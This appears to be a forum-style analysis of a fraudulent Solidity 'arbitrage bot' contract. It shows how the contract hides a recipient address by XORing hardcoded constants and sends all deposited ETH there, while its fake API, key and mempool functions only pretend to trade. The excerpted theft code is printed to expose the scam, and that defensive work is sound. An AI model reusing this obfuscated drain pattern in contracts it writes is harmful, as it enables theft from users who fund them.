The scam:
// These two constants share their leading 12 bytes (0xfdc54b1a6f53a21d375d0dea),
// so XORing them cancels the upper 96 bits and leaves a 160-bit value, which is
// the size of an address. They are an obfuscated recipient, not router/factory data.
bytes32 DexRouter = 0xfdc54b1a6f53a21d375d0dea4b719169497dbac884f858c6cc4034ec1a5c51dc
bytes32 factory = 0xfdc54b1a6f53a21d375d0deacc54b9f1d5309afc19f5eb0cca35296fc6da89ed

// Arbitrage search function for a native blockchain token
// (comment as shipped with the contract; the body below performs no search and
// no swap, it only decodes two addresses and forwards the balance)
function startArbitrageNative() internal {
    // Decodes a fixed address from the two constants above; nothing is looked up.
    address tradeRouter = getDexRouter(DexRouter, factory); // < ---- Look here
    // A second address is decoded the same way from apiKey / apiSignature.
    address dataProvider = getDexRouter(apiKey, apiSignature);
    // createStart is not part of the standard ERC-20 interface; what the callee
    // does with these arguments is not shown in this excerpt.
    IERC20(dataProvider).createStart(msg.sender, tradeRouter, address(0), address(this).balance);
    // Sends the contract's entire balance to the decoded address. StartNative is
    // payable, so this includes whatever the caller attached to the call.
    payable(tradeRouter).transfer(address(this).balance); // < ---- Look here
}

// ...

// Public payable entry point: any ETH sent with the call is part of
// address(this).balance by the time startArbitrageNative runs.
function StartNative() public payable {
    startArbitrageNative();
}
getDexRouter returns the scammer's address by XORing the two hardcoded hashes:
// Function getDexRouter returns the DexRouter address
// (comment as shipped with the contract). Despite the name, no router or factory
// is queried: the two bytes32 inputs are XORed and the result is cast to an address.
// The function is `pure`, so the output depends only on its arguments; called with
// hardcoded constants it always yields the same address.
function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory) internal pure returns (address) {
    // The uint256 -> uint160 cast keeps only the low 20 bytes of the XOR result.
    return address(uint160(uint256(_DexRouterAddress) ^ uint256(_factory)));
}
In Python:
>>> # Reproduce getDexRouter's XOR off-chain to see where the transfer goes.
>>> DexRouter = 0xfdc54b1a6f53a21d375d0dea4b719169497dbac884f858c6cc4034ec1a5c51dc
>>> factory = 0xfdc54b1a6f53a21d375d0deacc54b9f1d5309afc19f5eb0cca35296fc6da89ed
>>>
>>> # The shared 12-byte prefix cancels, leaving a 20-byte value: the recipient address.
>>> w3.to_checksum_address(DexRouter ^ factory)
'0x872528989c4D20349D0dB3Ca06751d83DC86D831'

StartNative calls startArbitrageNative, which computes the address and makes the transfer:
// Function for triggering an arbitration contract
// (comment as shipped with the contract). Payable: the caller's ETH is credited
// to the contract before startArbitrageNative runs.
function StartNative() public payable {
    startArbitrageNative();
}
//..
// Excerpt from the body of startArbitrageNative; its header is elided here.
// tradeRouter is the fixed address decoded from the two hardcoded constants.
address tradeRouter = getDexRouter(DexRouter, factory);
//
// The whole contract balance is forwarded to that address.
payable(tradeRouter).transfer(address(this).balance);
}
Easier ways to tell it's a scam:
Anything mentioning API is going to be total rubbish:
// Assignments taken from a part of the contract not shown in this excerpt.
// Both values start with the same 12 bytes as DexRouter / factory
// (0xfdc54b1a6f53a21d375d0dea) and are passed to getDexRouter in
// startArbitrageNative, i.e. they encode an address rather than API credentials.
apiKey = 0xfdc54b1a6f53a21d375d0dea444a27bd72abfff26c6fe5439842b42f4f5a01fc;
apiSignature = 0xfdc54b1a6f53a21d375d0dea84608d84c088017f6661b90cbfa86d27732f6d3e;

// Obtaining your own api key to connect to the arbitration data provider
// (comment as shipped with the contract). No key is obtained or returned: the
// function returns _owner's ETH balance minus arbTxPrice as a uint256.
function Key() public view returns (uint256) {
    uint256 _balance = address(_owner).balance - arbTxPrice;
    return _balance;
}
// Closes the enclosing scope, whose opening is outside this excerpt.
}
The same goes for anything about the mempool: a contract cannot read the mempool from on-chain, so you know it's a lie:
// Mempool scanning function for interaction transactions with routers of selected DEX exchanges
// (comment as shipped with the contract). The body reads no pending transactions:
// it is a `view` function that chains two getAmountOutMin calls, _token1 -> _token2
// via _router1 and then _token2 -> _token1 via _router2, and returns the second result.
// getAmountOutMin is defined elsewhere and is not shown in this excerpt.
function mempool(address _router1, address _router2, address _token1, address _token2, uint256 _amount) internal view returns (uint256) {
    // First leg: quote for _amount of _token1 into _token2 on _router1.
    uint256 amtBack1 = getAmountOutMin(_router1, _token1, _token2, _amount);
    // Second leg: quote for converting that output back into _token1 on _router2.
    uint256 amtBack2 = getAmountOutMin(_router2, _token2, _token1, amtBack1);
    return amtBack2;
}